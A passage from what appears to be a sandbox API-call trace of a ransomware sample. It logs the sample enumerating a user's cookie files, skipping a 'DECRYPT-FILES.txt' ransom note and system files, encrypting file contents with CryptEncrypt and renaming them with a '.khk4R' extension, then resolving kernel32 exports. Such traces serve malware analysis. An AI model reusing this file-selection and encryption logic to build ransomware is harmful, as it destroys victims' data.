returned="EnumDateFormatsExA" [0079.192] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.192] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.192] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.192] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.193] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.193] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt") returned 110 [0079.193] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R") returned 116 [0079.193] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt.khk4r"), dwFlags=0x0) returned 1 [0079.193] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.194] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.194] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.194] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x517fd8b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x51332930, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0x51332930, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x125, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@advertising[1].txt", cAlternateFileName="5P5NRG~1.TXT")) returned 1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="autorun.inf") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="boot.ini") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="desktop.ini") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="ntuser.dat") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="iconcache.db") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="bootsect.bak") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="thumbs.db") returned -1 [0079.194] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@advertising[1].txt", lpString2="Bootfont.bin") returned -1 [0079.195] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@advertising[1].txt") returned 39 [0079.195] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.195] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.195] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.195] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.195] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.195] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@advertising[1].txt") returned 39 [0079.195] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.195] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@advertising[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" [0079.195] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.195] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@advertising[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.195] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=293) returned 1 [0079.195] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.195] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.196] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.196] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.196] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.196] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.196] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.197] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.197] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.197] CloseHandle (hObject=0x464) returned 1 [0079.197] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.197] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.198] CloseHandle (hObject=0x0) returned 0 [0079.198] CloseHandle (hObject=0x460) returned 1 [0079.199] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.199] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.200] GetTickCount () returned 0x114c4b6 [0079.200] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.200] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.200] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.200] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.200] lstrlenA (lpString="kernel32.dll") returned 12 [0079.201] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.201] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.201] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.201] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.201] lstrlenA (lpString="ADDATOMA") returned 8 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.201] lstrlenA (lpString="ADDATOMW") returned 8 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.201] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.201] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.201] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.201] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.201] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.201] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.201] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.201] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.201] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.201] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.201] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.202] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.202] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.202] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.202] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.202] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.202] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.202] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.202] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.202] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.202] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.202] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.202] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.202] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.202] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.202] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.202] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.202] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.202] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.202] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.203] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.203] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.203] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.203] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.203] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.203] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.203] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.203] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.203] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.203] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.203] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.203] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.203] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.203] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.203] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.203] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.203] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.203] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.203] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.204] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.204] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.204] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.204] lstrlenA (lpString="BEEP") returned 4 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.204] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.204] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.204] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.204] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.204] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.204] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.204] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.204] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.204] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.204] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0079.204] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0079.204] lstrlenA (lpString="CANCELIO") returned 8 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0079.204] lstrlenA (lpString="CANCELIOEX") returned 10 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0079.204] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0079.204] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0079.205] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0079.205] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0079.205] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0079.205] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0079.205] lstrlenA (lpString="CHECKELEVATION") returned 14 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0079.205] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0079.205] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0079.205] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0079.205] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0079.205] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0079.205] 